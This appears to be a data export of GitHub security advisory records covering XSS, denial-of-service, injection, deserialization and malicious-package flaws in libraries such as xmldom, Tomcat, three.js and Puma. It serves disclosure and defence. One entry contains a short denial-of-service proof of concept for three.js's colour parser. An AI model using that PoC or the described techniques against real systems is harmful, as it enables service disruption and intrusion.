2018-10-15T21:43:12Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/zeit/next.js/releases/tag/7.0.2', 'https://github.com/advisories/GHSA-qw96-mm2g-c8m7', 'https://nvd.nist.gov/vuln/detail/CVE-2018-18282'}
null
GHSA
GHSA-5fg8-2547-mr8q
Misinterpretation of malicious XML input
### Impact xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications. ### Patches Update to one of the fixed versions of `@xmldom/xmldom` (`>=0.7.0`) See issue #271 for the status of publishing `xmldom` to npm or join #270 for Q&A/discussion until it's resolved. ### Workarounds Downstream applications can validate the input and reject the maliciously crafted documents. ### References Similar to this one reported on the Go standard library: - https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/ - https://mattermost.com/blog/securing-xml-implementations-across-the-web/ ### For more information If you have any questions or comments about this advisory: * Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom) * Email us: send an email to **all** addresses that are shown by `npm owner ls @xmldom/xmldom`
{'CVE-2021-32796'}
2022-01-04T19:36:30Z
2021-08-03T16:57:05Z
MODERATE
6.5
{'CWE-116'}
{'https://mattermost.com/blog/securing-xml-implementations-across-the-web/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32796', 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/', 'https://github.com/xmldom/xmldom/security/advisories/GHSA-5fg8-2547-mr8q', 'https://github.com/xmldom/xmldom/commit/7b4b743917a892d407356e055b296dcd6d107e8b', 'https://www.npmjs.com/package/@xmldom/xmldom', 'https://github.com/advisories/GHSA-5fg8-2547-mr8q'}
null
GHSA
GHSA-f9cm-p3w6-xvr3
Denial-of-Service Extended Event Loop Blocking in qs
Versions prior to 1.0.0 of `qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string. ## Recommendation Update to version 1.0.0 or later
{'CVE-2014-10064'}
2021-01-08T18:53:40Z
2018-10-09T00:38:48Z
HIGH
0
{'CWE-400'}
{'https://nodesecurity.io/advisories/28', 'https://www.npmjs.com/advisories/28', 'https://github.com/advisories/GHSA-f9cm-p3w6-xvr3', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10064'}
null
GHSA
GHSA-9xcj-c8cr-8c3c
In Apache Tomcat, when using FORM authentication there was a narrow window where an attacker could perform a session fixation attack
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.
{'CVE-2019-17563'}
2021-08-19T16:14:17Z
2019-12-26T18:22:26Z
HIGH
7.5
{'CWE-384'}
{'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://www.debian.org/security/2020/dsa-4680', 'https://security.netapp.com/advisory/ntap-20200107-0001/', 'https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html', 'https://lists.apache.org/thread.html/8b4c1db8300117b28a0f3f743c0b9e3f964687a690cdf9662a884bbd%40%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/reb9a66f176df29b9a832caa95ebd9ffa3284e8f4922ec4fa3ad8eb2e@%3Cissues.cxf.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17563', 'https://security.gentoo.org/glsa/202003-43', 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E', 'https://www.debian.org/security/2019/dsa-4596', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://github.com/advisories/GHSA-9xcj-c8cr-8c3c', 'https://seclists.org/bugtraq/2019/Dec/43', 'https://lists.debian.org/debian-lts-announce/2020/01/msg00024.html', 'https://usn.ubuntu.com/4251-1/'}
null
GHSA
GHSA-fq6p-x6j3-cmmq
Denial of service in three
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
{'CVE-2020-28496'}
2021-03-01T19:57:16Z
2021-03-01T19:57:16Z
HIGH
0
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-28496', 'https://github.com/advisories/GHSA-fq6p-x6j3-cmmq', 'https://snyk.io/vuln/SNYK-JS-THREE-1064931', 'https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e', 'https://github.com/mrdoob/three.js/issues/21132', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972'}
null
GHSA
GHSA-8948-ffc6-jg52
Insecure Default Configuration in redbird
Versions of `redbird` prior to 0.9.1 have a vulnerable default configuration of allowing TLS 1.0 connections on `lib/proxy.js`. The package does not provide an option to disable TLS 1.0 which is deprecated and vulnerable. ## Recommendation Upgrade to version 0.9.1 or later.
null
2021-08-04T20:58:53Z
2019-06-06T15:32:21Z
MODERATE
4.2
{'CWE-20'}
{'https://github.com/OptimalBits/redbird/pull/207', 'https://www.npmjs.com/advisories/828', 'https://github.com/OptimalBits/redbird/commit/39c7a2da84a2ddddfe046ea80e98800518920516', 'https://github.com/advisories/GHSA-8948-ffc6-jg52', 'https://snyk.io/vuln/SNYK-JS-REDBIRD-174455'}
null
GHSA
GHSA-qmqc-x3r4-6v39
Polymorphic deserialization of malicious object in jackson-databind
A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code.
{'CVE-2019-14893'}
2021-02-25T20:18:58Z
2020-05-15T18:59:07Z
HIGH
0
{'CWE-502'}
{'https://security.netapp.com/advisory/ntap-20200327-0006/', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://github.com/FasterXML/jackson-databind/issues/2469', 'https://access.redhat.com/errata/RHSA-2020:0729', 'https://nvd.nist.gov/vuln/detail/CVE-2019-14893', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317', 'https://github.com/advisories/GHSA-qmqc-x3r4-6v39', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893'}
null
GHSA
GHSA-84j7-475p-hp8v
HTTP Response Splitting in Puma
In Puma (RubyGem) before 4.3.2 and 3.12.3, if an application using Puma allows untrusted input in a response header, an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting. While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS). This is related to CVE-2019-16254, which fixed this vulnerability for the WEBrick Ruby web server. This has been fixed in versions 4.3.2 and 3.12.3 by checking all headers for line endings and rejecting headers with those characters.
{'CVE-2020-5247'}
2021-01-08T20:28:16Z
2020-02-28T16:53:55Z
MODERATE
6.5
{'CWE-113'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-5247', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMJ3CGZ3DLBJ5WUUKMI5ZFXFJQMXJZIK/', 'https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v', 'https://www.ruby-lang.org/en/news/2019/10/01/http-response-splitting-in-webrick-cve-2019-16254', 'https://owasp.org/www-community/attacks/HTTP_Response_Splitting', 'https://github.com/puma/puma/commit/c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DIHVO3CQMU7BZC7FCTSRJ33YDNS3GFPK/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJ3LL5F5QADB6LM46GXZETREAKZMQNRD/', 'https://github.com/advisories/GHSA-84j7-475p-hp8v'}
null
GHSA
GHSA-gc94-6w89-hpqr
Command Injection in fs-path
All versions of `fs-path` are vulnerable to command injection is unsanitized user input is passed in. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
null
2021-09-16T20:59:59Z
2019-06-12T16:37:07Z
HIGH
0
{'CWE-62', 'CWE-77'}
{'https://www.npmjs.com/advisories/661', 'https://github.com/advisories/GHSA-gc94-6w89-hpqr', 'https://hackerone.com/reports/324491', 'https://nodesecurity.io/advisories/661'}
null
GHSA
GHSA-p5w7-qmq6-pmjr
Users able to query database metadata in Apache Superset
In Apache Incubator Superset before 0.31 user could query database metadata information from a database he has no access to, by using a specially crafted complex query.
{'CVE-2019-12413'}
2021-08-19T19:28:39Z
2020-02-26T19:55:32Z
MODERATE
5.3
{'CWE-200'}
{'https://github.com/advisories/GHSA-p5w7-qmq6-pmjr', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12413', 'https://lists.apache.org/thread.html/85ab04f8c52df8c353ecfa0ecd2ff27fc07fb8ab7566a754349806be%40%3Cdev.superset.apache.org%3E', 'https://snyk.io/vuln/SNYK-PYTHON-APACHESUPERSET-558911'}
null
GHSA
GHSA-jp4j-47f9-2vc3
Integer Overflow or Wraparound in NATS Server
An integer overflow in NATS Server 2.0.0 allows a remote attacker to crash the server by sending a crafted request.
{'CVE-2019-13126'}
2021-05-18T18:14:55Z
2021-05-18T18:14:55Z
HIGH
7.1
{'CWE-190'}
{'https://github.com/advisories/GHSA-jp4j-47f9-2vc3', 'https://github.com/nats-io/nats-server/pull/1441', 'https://github.com/nats-io/nats-server/pull/1053', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13126', 'https://www.twistlock.com/labs-blog/finding-dos-vulnerability-nats-go-fuzz-cve-2019-13126/', 'https://github.com/nats-io/nats-server/commits/master', 'https://github.com/nats-io/nats-server/commit/07ef71ff98f45f8c2711be4aeaf484610d891dda'}
null
GHSA
GHSA-w7wg-24g3-2c78
Malicious Package in requset
All versions of `requset` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-09-30T20:29:47Z
2020-09-02T21:14:17Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-w7wg-24g3-2c78', 'https://www.npmjs.com/advisories/869'}
null
GHSA
GHSA-gxmc-5wj3-jx64
Cross-site scripting in application/controllers/dropbox.php in JustWriting
Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
{'CVE-2021-41467'}
2021-10-05T16:02:21Z
2021-10-04T20:13:25Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/hjue/JustWriting/issues/106', 'https://github.com/advisories/GHSA-gxmc-5wj3-jx64', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41467', 'https://github.com/hjue/JustWriting/'}
null
GHSA
GHSA-gp82-xr77-88f4
Moderate severity vulnerability that affects radiant
There are multiple Persistent XSS vulnerabilities in Radiant CMS 1.1.4. They affect Personal Preferences (Name and Username) and Configuration (Site Title, Dev Site Domain, Page Parts, and Page Fields).
{'CVE-2018-7261'}
2021-09-13T12:38:12Z
2018-07-27T17:08:29Z
MODERATE
5.4
{'CWE-79'}
{'http://www.securityfocus.com/archive/1/541798/100/0/threaded', 'http://www.securityfocus.com/bid/103080', 'https://github.com/advisories/GHSA-gp82-xr77-88f4', 'https://nvd.nist.gov/vuln/detail/CVE-2018-7261'}
null
GHSA
GHSA-mpgr-2cx9-327h
Information disclosure in SSB-DB
### Impact _What kind of vulnerability is it? Who is impacted?_ Servers running SSB-DB 20.0.0 (which is packaged with SSB-Server 16.0.0) must upgrade immediately. **There is no evidence that other SSB apps are vulnerable or that this problem has been exploited in the wild.** The `get()` method is supposed to only decrypt messages when you explicitly ask it to, but there's a bug where it's decrypting any message that it can. This means that it's returning the decrypted content of private messages, which a malicious peer could use to get access to private data. This only affects peers running SSB-DB@20.0.0 who also have private messages, and is only known to be exploitable if you're also running SSB-OOO (default in SSB-Server), which exposes a thin wrapper around `get()` to anonymous peers. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, please upgrade to SSB-DB 20.0.1 (or SSB-Server 16.0.1) immediately. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ You may be able to disable the most obvious attack vector, SSB-OOO, by disabling the plugin, but you should upgrade immediately anyway. ### For more information If you have any questions or comments about this advisory, open an issue in [SSB-DB](https://github.com/ssbc/ssb-db/)
{'CVE-2020-4045'}
2022-04-19T19:02:28Z
2020-06-11T21:09:04Z
HIGH
7.5
{'CWE-200'}
{'https://github.com/advisories/GHSA-mpgr-2cx9-327h', 'https://github.com/ssbc/ssb-db/commit/43334d0871c9cc6220e0f6d6338499060f7761d4', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4045', 'https://github.com/ssbc/ssb-db/security/advisories/GHSA-mpgr-2cx9-327h'}
null
GHSA
GHSA-v76m-f5cx-8rg4
Moderate severity vulnerability that affects DotNetNuke.Core
Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 7.4.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
{'CVE-2015-1566'}
2021-09-20T15:49:57Z
2018-10-16T19:33:25Z
MODERATE
0
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2015-1566', 'https://github.com/advisories/GHSA-v76m-f5cx-8rg4', 'http://secunia.com/advisories/62832', 'http://www.dnnsoftware.com/platform/manage/security-center'}
null
GHSA
GHSA-p8p6-rcp6-4mrm
Uncontrolled Recursion in Play Framework
In Play Framework 2.6.0 through 2.8.2, stack consumption can occur because of unbounded recursion during parsing of crafted JSON documents.
{'CVE-2020-26883'}
2022-02-10T20:23:01Z
2022-02-10T20:23:01Z
HIGH
7.5
{'CWE-674'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-26883', 'https://github.com/advisories/GHSA-p8p6-rcp6-4mrm', 'https://github.com/playframework/playframework/pull/10495', 'https://www.playframework.com/security/vulnerability/CVE-2020-26883-JsonParseUncontrolledRecursion'}
null
GHSA
GHSA-vx5w-cxch-wwc9
Path Traversal in f-serv
All versions of `f-serv` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2021-09-29T16:24:08Z
2020-09-03T19:02:27Z
CRITICAL
0
{'CWE-22'}
{'https://github.com/advisories/GHSA-vx5w-cxch-wwc9', 'https://www.npmjs.com/advisories/1092'}
null
GHSA
GHSA-p48w-vf3c-rqjx
Cross-Site Scripting in Bootstrap Package
### Problem It has been discovered that rendering content in the website frontend is vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability. The following templates are affected by the vulnerability: * `Resources/Private/Partials/ContentElements/Carousel/Item/CallToAction.html` * `Resources/Private/Partials/ContentElements/Carousel/Item/Header.html` * `Resources/Private/Partials/ContentElements/Carousel/Item/Text.html` * `Resources/Private/Partials/ContentElements/Carousel/Item/TextAndImage.html` * `Resources/Private/Partials/ContentElements/Header/SubHeader.html` Users of the extension, who have overwritten the affected templates with custom code must manually apply the security fix as shown in [this Git commit](https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b). ### Solution Update to version 7.1.2, 8.0.8, 9.0.4, 9.1.3, 10.0.10 or 11.0.3 of the Bootstrap Package that fix the problem described. Updated version are available from the TYPO3 extension manager, Packagist and at https://extensions.typo3.org/extension/download/bootstrap_package/. ### Credits Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.
{'CVE-2021-21365'}
2022-04-19T19:02:55Z
2021-04-29T21:51:21Z
MODERATE
5.4
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-21365', 'https://github.com/advisories/GHSA-p48w-vf3c-rqjx', 'https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b', 'https://github.com/benjaminkott/bootstrap_package/security/advisories/GHSA-p48w-vf3c-rqjx', 'https://typo3.org/security/advisory/typo3-ext-sa-2021-007'}
null
GHSA
GHSA-qpw2-xchm-655q
Out-of-Bounds read in stringstream
Versions less than 0.0.6 of the Node.js stringstream module are vulnerable to an out-of-bounds read because of allocation of uninitialized buffers when a number is passed in the input stream (when using Node.js 4.x). # WITHDRAWN This is a duplicate of GHSA-mf6x-7mm4-x2g7
null
2022-01-06T20:31:08Z
2022-01-06T20:31:01Z
MODERATE
6.5
{'CWE-125'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-21270', 'https://www.npmjs.com/advisories/664', 'https://github.com/mhart/StringStream/issues/7', 'https://github.com/advisories/GHSA-qpw2-xchm-655q', 'https://hackerone.com/reports/321670', 'https://github.com/mhart/StringStream/commit/2f4a9d496f94b0880e01a26857aa266a5a3ef274'}
null
GHSA
GHSA-93g4-3phc-g4xw
SQL injection in Apache DolphinScheduler
In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password)
{'CVE-2021-27644'}
2021-11-03T17:30:18Z
2021-11-03T17:30:18Z
HIGH
8.8
{'CWE-89'}
{'http://www.openwall.com/lists/oss-security/2021/11/01/3', 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6@%3Cdev.dolphinscheduler.apache.org%3E', 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6%40%3Cdev.dolphinscheduler.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27644', 'https://github.com/advisories/GHSA-93g4-3phc-g4xw'}
null
GHSA
GHSA-f5fj-7265-jxhj
Information Exposure
Gitea version prior to version 1.5.1 contains a CWE-200 vulnerability that can result in Exposure of users private email addresses. This attack appear to be exploitable via Watch a repository to receive email notifications. Emails received contain the other recipients even if they have the email set as private. This vulnerability appears to have been fixed in 1.5.1.
{'CVE-2018-1000803'}
2022-04-12T22:02:36Z
2022-02-15T01:57:18Z
MODERATE
5.3
{'CWE-200'}
{'https://github.com/go-gitea/gitea/pull/4664', 'https://github.com/go-gitea/gitea/commit/194a11eb110cd98fc2ba52861abf7770db6885a3', 'https://github.com/go-gitea/gitea/pull/4664/files#diff-146e0c2b5bb1ea96c9fb73d509456e57', 'https://github.com/advisories/GHSA-f5fj-7265-jxhj', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000803'}
null
GHSA
GHSA-w89r-qch4-8jv5
Out-of-bounds write
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.
{'CVE-2019-0912'}
2021-03-29T20:59:59Z
2021-03-29T20:59:59Z
HIGH
7.5
{'CWE-787'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-0912', 'https://github.com/chakra-core/ChakraCore/commit/936a5af1c07e0fdec9aab85c05339dabe4aaeeb1', 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0912', 'https://github.com/advisories/GHSA-w89r-qch4-8jv5'}
null
GHSA
GHSA-mhfv-8rc9-w38c
Arbitrary shell execution
Uses of shell_exec() and exec() were not escaping filenames and configuration settings in most cases
null
2022-03-26T00:31:53Z
2022-03-26T00:06:00Z
HIGH
0
null
{'https://github.com/squizlabs/PHP_CodeSniffer/releases/tag/2.8.1', 'https://github.com/advisories/GHSA-mhfv-8rc9-w38c', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/squizlabs/php_codesniffer/2017-03-01.yaml'}
null
GHSA
GHSA-c99r-67x4-whj6
Reflected cross-site scripting in development mode handler in Vaadin 14, 15-19
URL encoding error in development mode handler in `com.vaadin:flow-server` versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser. - https://vaadin.com/security/cve-2021-33604
{'CVE-2021-33604'}
2021-10-05T17:29:13Z
2021-06-28T16:56:07Z
LOW
2.5
{'CWE-172'}
{'https://vaadin.com/security/cve-2021-33604', 'https://github.com/vaadin/flow/pull/11099', 'https://github.com/vaadin/platform/security/advisories/GHSA-c99r-67x4-whj6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33604', 'https://github.com/advisories/GHSA-c99r-67x4-whj6'}
null
GHSA
GHSA-3933-wvjf-pcvc
Out of bounds access in lucet-runtime-internals
An issue was discovered in the lucet-runtime-internals crate before 0.5.1 for Rust. It mishandles sigstack allocation. Guest programs may be able to obtain sensitive information, or guest programs can experience memory corruption.
{'CVE-2020-35859'}
2021-08-25T20:46:16Z
2021-08-25T20:46:16Z
CRITICAL
9.1
{'CWE-787', 'CWE-125'}
{'https://github.com/bytecodealliance/lucet/pull/401', 'https://rustsec.org/advisories/RUSTSEC-2020-0004.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35859', 'https://github.com/advisories/GHSA-3933-wvjf-pcvc'}
null
GHSA
GHSA-jmx8-355m-8vwh
Unauthorized client-side property update in UIDL request handler in Vaadin 10 and 11
Missing check in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.5 (Vaadin 10.0.0 through 10.0.7, and 11.0.0 through 11.0.2) allows attacker to update element property values via crafted synchronization message. - https://vaadin.com/security/cve-2018-25007
{'CVE-2018-25007'}
2021-04-26T20:07:03Z
2021-04-19T14:53:09Z
LOW
2.6
{'CWE-754'}
{'https://github.com/vaadin/flow/security/advisories/GHSA-jmx8-355m-8vwh', 'https://github.com/vaadin/flow/pull/4774', 'https://nvd.nist.gov/vuln/detail/CVE-2018-25007', 'https://github.com/advisories/GHSA-jmx8-355m-8vwh', 'https://vaadin.com/security/cve-2018-25007'}
null
GHSA
GHSA-wmg4-8cp2-hpg9
Denial of service attack via memory exhaustion
### Impact Sydent does not limit the size of requests it receives from HTTP clients. A malicious user could send an HTTP request with a very large body, leading to disk space exhaustion and denial of service. Sydent also does not limit response size for requests it makes to remote Matrix homeservers. A malicious homeserver could return a very large response, again leading to memory exhaustion and denial of service. This affects any server which accepts registration requests from untrusted clients. ### Patches Patched by 89071a1, 0523511, f56eee3. ### Workarounds Request sizes can be limited in an HTTP reverse-proxy. There are no known workarounds for the problem with overlarge responses. ### For more information If you have any questions or comments about this advisory, email us at security@matrix.org.
{'CVE-2021-29430'}
2021-04-19T14:54:04Z
2021-04-19T14:54:04Z
LOW
0
{'CWE-20', 'CWE-400'}
{'https://github.com/matrix-org/sydent/commit/0523511d2fb40f2738f8a8549868f44b96e5dab7', 'https://github.com/matrix-org/sydent/releases/tag/v2.3.0', 'https://github.com/matrix-org/sydent/commit/89071a1a754c69a50deac89e6bb74002d4cda19d', 'https://github.com/matrix-org/sydent/security/advisories/GHSA-wmg4-8cp2-hpg9', 'https://github.com/advisories/GHSA-wmg4-8cp2-hpg9', 'https://github.com/matrix-org/sydent/commit/f56eee315b6c44fdd9f6aa785cc2ec744a594428', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29430', 'https://pypi.org/project/matrix-sydent/'}
null
GHSA
GHSA-mxhp-79qh-mcx6
taffy can allow access to any data items in the DB
taffy through 2.6.2 allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, taffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB.
{'CVE-2019-10790'}
2021-07-28T18:32:27Z
2020-02-19T16:43:42Z
HIGH
7.5
{'CWE-668', 'CWE-20'}
{'https://snyk.io/vuln/SNYK-JS-TAFFY-546521', 'https://github.com/advisories/GHSA-mxhp-79qh-mcx6', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10790', 'https://www.npmjs.com/package/taffy'}
null
GHSA
GHSA-mmc9-pwm7-qj5w
Unaligned memory access in rand_core
### Impact Affected versions of this crate violated alignment when casting byte slices to integer slices, resulting in undefined behavior. `rand_core::BlockRng::next_u64` and `rand_core::BlockRng::fill_bytes` are affected. ### Patches The flaw was corrected by Ralf Jung and Diggory Hardy for `rand_core >= 0.4.2`. ### Workarounds None. ### References See [Rand's changelog](https://github.com/rust-random/rand/blob/master/rand_core/CHANGELOG.md#050---2019-06-06). ### For more information If you have any questions or comments about this advisory, [open an issue in the Rand repository](https://github.com/rust-random/rand/issues/new/choose).
{'CVE-2020-25576'}
2022-05-02T20:41:52Z
2021-08-25T20:56:50Z
CRITICAL
9.8
{'CWE-704'}
{'https://github.com/rust-random/rand/security/advisories/GHSA-mmc9-pwm7-qj5w', 'https://rustsec.org/advisories/RUSTSEC-2019-0035.html', 'https://github.com/advisories/GHSA-mmc9-pwm7-qj5w', 'https://github.com/rust-random/rand/blob/master/rand_core/CHANGELOG.md#050---2019-06-06'}
null
GHSA
GHSA-536p-4pcj-5mr9
raspap-webgui in RaspAP 2.6.6 allows attackers to execute commands as root because of the insecure sudoers permissions.
raspap-webgui in RaspAP 2.6.6 allows attackers to execute commands as root because of the insecure sudoers permissions. The www-data account can execute /etc/raspap/hostapd/enablelog.sh as root with no password; however, the www-data account can also overwrite /etc/raspap/hostapd/enablelog.sh with any executable content.
{'CVE-2021-38557'}
2021-09-03T20:36:07Z
2021-09-02T17:10:52Z
HIGH
8.8
{'CWE-732', 'CWE-276'}
{'https://github.com/advisories/GHSA-536p-4pcj-5mr9', 'https://github.com/RaspAP/raspap-webgui', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38557', 'https://github.com/RaspAP/raspap-webgui/blob/fabc48c7daae4013b9888f266332e510b196a062/installers/raspap.sudoers', 'https://zerosecuritypenetrationtesting.com/?page_id=306'}
null
GHSA
GHSA-4q53-fqhc-cr46
Low severity vulnerability that affects ember-source
Cross-site scripting (XSS) vulnerability in the link-to helper in Ember.js 1.2.x before 1.2.2, 1.3.x before 1.3.2, and 1.4.x before 1.4.0-beta.6, when used in non-block form, allows remote attackers to inject arbitrary web script or HTML via the title attribute.
{'CVE-2014-0046'}
2021-09-01T17:43:59Z
2018-08-28T22:33:42Z
LOW
0
{'CWE-79'}
{'https://exchange.xforce.ibmcloud.com/vulnerabilities/91242', 'http://emberjs.com/blog/2014/02/07/ember-security-releases.html', 'https://github.com/advisories/GHSA-4q53-fqhc-cr46', 'https://nvd.nist.gov/vuln/detail/CVE-2014-0046', 'http://secunia.com/advisories/56965', 'http://www.openwall.com/lists/oss-security/2014/02/14/6', 'http://www.securityfocus.com/bid/65579', 'https://groups.google.com/forum/#!topic/ember-security/1h6FRgr8lXQ'}
null
GHSA
GHSA-p5w8-wqhj-9hhf
StripComments filter contains a regular expression that is vulnerable to ReDOS (Regular Expression Denial of Service)
### Impact The formatter function that strips comments from a SQL contains a regular expression that is vulnerable to [ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) (Regular Expression Denial of Service). The regular expression may cause exponential backtracking on strings containing many repetitions of '\r\n' in SQL comments. ### Patches The issues has been fixed in sqlparse 0.4.2. ### Workarounds Only the formatting feature that removes comments from SQL statements is affected by this regular expression. As a workaround don't use the `sqlformat.format` function with keyword `strip_comments=True` or the `--strip-comments` command line flag when using the `sqlformat` command line tool. ### References This issue was discovered by GitHub team members @erik-krogh and @yoff. It was found using a [CodeQL](https://codeql.github.com/) query which identifies inefficient regular expressions. You can see the results of the query on python-sqlparse by following [this link](https://lgtm.com/query/2223658096471222354/). ### For more information If you have any questions or comments about this advisory: * Open an issue in [sqlparse issue tracker](https://github.com/andialbrecht/sqlparse/issues) * Email us at [albrecht.andi@gmail.com](mailto:albrecht.andi@gmail.com)
{'CVE-2021-32839'}
2022-04-19T19:03:08Z
2021-09-10T17:56:06Z
HIGH
7.5
{'CWE-400'}
